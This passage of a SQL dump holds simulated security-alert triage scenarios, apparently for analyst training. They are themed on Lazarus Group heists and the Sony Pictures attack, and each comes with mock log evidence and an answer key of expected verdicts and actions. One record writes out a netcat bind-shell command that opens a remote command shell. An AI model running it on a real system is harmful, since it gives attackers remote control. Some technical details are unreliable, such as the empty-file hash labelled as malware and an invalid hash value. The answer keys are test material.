process\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.848Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"hostname\\\":\\\"bankserver01\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"51.15.123.45\\\",\\\"scheduled_task\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateCheck\\\",\\\"malware_filename\\\":\\\"svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A scheduled task was created to run malicious executable at startup.\\\"}\"},{\"timestamp\":\"2026-03-07T14:14:20.848Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"hostname\\\":\\\"bankserver01\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"51.15.123.45\\\",\\\"scheduled_task\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateCheck\\\",\\\"malware_filename\\\":\\\"svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A scheduled task was created to run malicious executable at startup.\\\"}\"},{\"timestamp\":\"2026-03-07T14:13:20.848Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected 
[Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"hostname\\\":\\\"bankserver01\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"51.15.123.45\\\",\\\"scheduled_task\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateCheck\\\",\\\"malware_filename\\\":\\\"svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A scheduled task was created to run malicious executable at startup.\\\"}\"},{\"timestamp\":\"2026-03-07T14:12:20.848Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"hostname\\\":\\\"bankserver01\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"51.15.123.45\\\",\\\"scheduled_task\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateCheck\\\",\\\"malware_filename\\\":\\\"svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A scheduled task was created to run malicious executable at startup.\\\"}\"},{\"timestamp\":\"2026-03-07T14:11:20.848Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"hostname\\\":\\\"bankserver01\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"51.15.123.45\\\",\\\"scheduled_task\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateCheck\\\",\\\"malware_filename\\\":\\\"svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A scheduled task was created to run malicious executable at startup.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1459, 'Coordinated Mule Network Activation - Step 4', 'high', 'ATM Surveillance Footage', 'Mules have been dispatched to various ATMs to execute synchronized cash withdrawals. Surveillance footage indicates a coordinated effort exploiting compromised systems to manipulate transactions.', 'Lateral Movement', 'T1021.002 - Remote Services: SMB/Windows Admin Shares', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.15\",\"username\":\"atm_operator\",\"filename\":\"atm_control.exe\",\"hash\":\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\",\"description\":\"ATM withdrawal command issued\",\"location\":\"ATM Terminal 12, 5th Avenue\",\"action\":\"Synchronized withdrawal command executed\"}', '2026-03-07 00:50:56', '2026-03-09 05:45:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local ATM network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"atm_operator\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected for this user\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"atm_control.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"Executable used for unauthorized ATM commands\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ATM manipulation 
malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"atm_operator\\\",\\\"filename\\\":\\\"atm_control.exe\\\",\\\"hash\\\":\\\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\\\",\\\"description\\\":\\\"ATM withdrawal command issued\\\",\\\"location\\\":\\\"ATM Terminal 12, 5th Avenue\\\",\\\"action\\\":\\\"Synchronized withdrawal command executed\\\"}\"},{\"timestamp\":\"2026-03-07T14:14:20.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"atm_operator\\\",\\\"filename\\\":\\\"atm_control.exe\\\",\\\"hash\\\":\\\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\\\",\\\"description\\\":\\\"ATM withdrawal command issued\\\",\\\"location\\\":\\\"ATM Terminal 12, 5th Avenue\\\",\\\"action\\\":\\\"Synchronized withdrawal command executed\\\"}\"},{\"timestamp\":\"2026-03-07T14:13:20.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"atm_operator\\\",\\\"filename\\\":\\\"atm_control.exe\\\",\\\"hash\\\":\\\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\\\",\\\"description\\\":\\\"ATM withdrawal command issued\\\",\\\"location\\\":\\\"ATM Terminal 12, 5th Avenue\\\",\\\"action\\\":\\\"Synchronized withdrawal command executed\\\"}\"},{\"timestamp\":\"2026-03-07T14:12:20.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"atm_operator\\\",\\\"filename\\\":\\\"atm_control.exe\\\",\\\"hash\\\":\\\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\\\",\\\"description\\\":\\\"ATM withdrawal command issued\\\",\\\"location\\\":\\\"ATM Terminal 12, 5th Avenue\\\",\\\"action\\\":\\\"Synchronized withdrawal command executed\\\"}\"},{\"timestamp\":\"2026-03-07T14:11:20.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"atm_operator\\\",\\\"filename\\\":\\\"atm_control.exe\\\",\\\"hash\\\":\\\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\\\",\\\"description\\\":\\\"ATM withdrawal command issued\\\",\\\"location\\\":\\\"ATM Terminal 12, 5th Avenue\\\",\\\"action\\\":\\\"Synchronized withdrawal command executed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1460, 'Exfiltration of Stolen Funds', 'critical', 'Financial Transaction Monitoring', 'Alert triggered during the exfiltration phase of a cyber heist involving the transfer of laundered funds to offshore accounts. The operation is suspected to be conducted by the Lazarus Group using sophisticated financial manipulation techniques.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T15:45:32Z\",\"transaction_id\":\"TX123456789\",\"source_ip\":\"192.168.10.45\",\"destination_ip\":\"203.0.113.15\",\"amount\":\"5,000,000 USD\",\"currency\":\"USD\",\"destination_account\":\"Offshore-Account-987654321\",\"source_account\":\"Compromised-Account-123456789\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_filename\":\"funds_transfer.exe\",\"username\":\"jdoe\",\"comments\":\"Funds moved to offshore account using compromised credentials.\"}', '2026-03-07 00:50:56', '2026-03-09 05:46:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in transaction.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP associated with known offshore financial activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash for malware used in financial theft operations.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"funds_transfer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable used in unauthorized fund 
transfers.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"Account compromised; used in unauthorized transactions.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"transaction_id\\\":\\\"TX123456789\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"Offshore-Account-987654321\\\",\\\"source_account\\\":\\\"Compromised-Account-123456789\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"funds_transfer.exe\\\",\\\"username\\\":\\\"jdoe\\\",\\\"comments\\\":\\\"Funds moved to offshore account using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-03-07T14:14:20.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"transaction_id\\\":\\\"TX123456789\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"amount\\\":\\\"5,000,000 
USD\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"Offshore-Account-987654321\\\",\\\"source_account\\\":\\\"Compromised-Account-123456789\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"funds_transfer.exe\\\",\\\"username\\\":\\\"jdoe\\\",\\\"comments\\\":\\\"Funds moved to offshore account using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-03-07T14:13:20.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"transaction_id\\\":\\\"TX123456789\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"Offshore-Account-987654321\\\",\\\"source_account\\\":\\\"Compromised-Account-123456789\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"funds_transfer.exe\\\",\\\"username\\\":\\\"jdoe\\\",\\\"comments\\\":\\\"Funds moved to offshore account using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-03-07T14:12:20.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"transaction_id\\\":\\\"TX123456789\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"Offshore-Account-987654321\\\",\\\"source_account\\\":\\\"Compromised-Account-123456789\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"funds_transfer.exe\\\",\\\"username\\\":\\\"jdoe\\\",\\\"comments\\\":\\\"Funds moved to offshore account using compromised 
credentials.\\\"}\"},{\"timestamp\":\"2026-03-07T14:11:20.851Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"transaction_id\\\":\\\"TX123456789\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"Offshore-Account-987654321\\\",\\\"source_account\\\":\\\"Compromised-Account-123456789\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"funds_transfer.exe\\\",\\\"username\\\":\\\"jdoe\\\",\\\"comments\\\":\\\"Funds moved to offshore account using compromised credentials.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1461, 'Initial Access: Spear Phishing Campaign', 'high', 'Email logs', 'The attackers initiated their operation by launching a tailored spear phishing campaign aimed at Sony employees, leveraging social engineering tactics to deliver malicious payloads. A suspicious email with a malicious attachment was detected, originating from a known malicious public IP address.', 'Phishing', 'T1566.001', 1, 'Closed', 232, '{\"timestamp\":\"2023-10-12T14:35:21Z\",\"source_ip\":\"185.123.231.45\",\"destination_email\":\"j.smith@sonypictures.com\",\"subject\":\"Urgent: Update Required\",\"attachment\":{\"name\":\"Update_Required.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"internal_ip\":\"192.168.1.25\"}', '2026-03-07 00:51:05', '2026-03-11 17:51:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.123.231.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous phishing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"j.smith@sonypictures.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Valid Sony Pictures employee email\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted 
host\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Spear Phishing Campaign\",\"date\":\"2026-03-07T14:15:20.852Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1462, 'Execution: Deployment of Destructive Malware', 'critical', 'Endpoint security logs', 'Upon gaining access, the attackers deployed a custom-built malware designed to destroy data and disrupt Sony Pictures\' operations, demonstrating the group\'s capability for destructive cyber attacks.', 'Malware', 'T1485: Data Destruction', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T03:45:30Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.15\",\"username\":\"j.doe\",\"process_name\":\"wiper.exe\",\"file_hash\":\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\",\"filename\":\"destructive_payload.dll\",\"action\":\"Executed\",\"status\":\"Success\"}', '2026-03-07 00:51:05', '2026-03-11 03:21:50', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Feed\",\"verdict\":\"malicious\",\"details\":\"Known Lazarus Group IP used in previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with destructive malware used by Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"destructive_payload.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"File used in execution of destructive payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 
NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.853Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"j.doe\\\",\\\"process_name\\\":\\\"wiper.exe\\\",\\\"file_hash\\\":\\\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\\",\\\"filename\\\":\\\"destructive_payload.dll\\\",\\\"action\\\":\\\"Executed\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-03-07T14:14:20.853Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"j.doe\\\",\\\"process_name\\\":\\\"wiper.exe\\\",\\\"file_hash\\\":\\\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\\",\\\"filename\\\":\\\"destructive_payload.dll\\\",\\\"action\\\":\\\"Executed\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-03-07T14:13:20.853Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"j.doe\\\",\\\"process_name\\\":\\\"wiper.exe\\\",\\\"file_hash\\\":\\\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\\",\\\"filename\\\":\\\"destructive_payload.dll\\\",\\\"action\\\":\\\"Executed\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-03-07T14:12:20.853Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"j.doe\\\",\\\"process_name\\\":\\\"wiper.exe\\\",\\\"file_hash\\\":\\\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\\",\\\"filename\\\":\\\"destructive_payload.dll\\\",\\\"action\\\":\\\"Executed\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-03-07T14:11:20.853Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"j.doe\\\",\\\"process_name\\\":\\\"wiper.exe\\\",\\\"file_hash\\\":\\\"a9f5d8e7b0c8f3a2c1e4d5b6f7g8h9i0\\\",\\\"filename\\\":\\\"destructive_payload.dll\\\",\\\"action\\\":\\\"Executed\\\",\\\"status\\\":\\\"Success\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1463, 'Persistence: Establishing Backdoor Access', 'critical', 'Network traffic analysis', 'To ensure continued access, the attackers installed backdoors across the network, allowing them to remotely control and monitor compromised systems without detection.', 'Backdoor', 'T1105: Ingress Tool Transfer', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T06:34:22Z\",\"src_ip\":\"193.168.1.100\",\"dst_ip\":\"10.0.0.25\",\"protocol\":\"TCP\",\"src_port\":443,\"dst_port\":12345,\"filename\":\"nc.exe\",\"file_hash\":\"b6a9b3f8a8e4b5c8f9c2d7e58f8a3b6c\",\"username\":\"j.doe\",\"action\":\"file_transfer\",\"threat_actor\":\"Lazarus Group\",\"malware_name\":\"Backdoor:Win32/CustomLazarus\",\"external_command\":\"RUN nc.exe -lvp 12345 -e cmd.exe\"}', '2026-03-07 00:51:05', '2026-03-11 03:23:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"193.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"ip-reputation-database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal-network\",\"verdict\":\"internal\",\"details\":\"Internal server identified as targeted host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"nc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware-analysis\",\"verdict\":\"malicious\",\"details\":\"File used for unauthorized access and 